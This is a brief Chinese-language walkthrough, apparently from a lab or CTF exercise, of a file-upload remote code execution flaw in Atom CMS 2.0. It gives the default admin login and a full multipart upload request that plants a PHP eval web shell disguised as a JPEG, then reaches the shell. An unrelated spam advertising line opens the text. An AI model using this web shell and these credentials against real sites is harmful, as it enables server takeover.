刷qq會(huì)員自己做網(wǎng)站杭州正規(guī)引流推廣公司
漏洞描述:Atom CMS 2.0版本存在遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞源于/admin/uploads.php 未能正確過(guò)濾構(gòu)造代碼段的特殊元素。攻擊者可利用該漏洞導(dǎo)致任意代碼執(zhí)行。
其實(shí)這就是一個(gè)文件上傳漏洞罷了。。。。
打開(kāi)之后,/home
路由是個(gè)空白
信息搜集:該cms有默認(rèn)郵箱/密碼 alan@alan.com
/password
,到/admin
路由下嘗試登錄。
Users下有個(gè)上傳文件功能,可能是上傳頭像用的。
抓包中無(wú)文件上傳的內(nèi)容????(奇奇怪怪)
看了一下,漏洞路由在/admin/uploads.php
,直接在界面中點(diǎn)擊到不了這個(gè)路由。。。。
直接修改剛剛的包吧
直接傳php文件,這cms寫(xiě)的真shit
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--
訪問(wèn)木馬存儲(chǔ)路由/uploads/1707520195231.php
getshell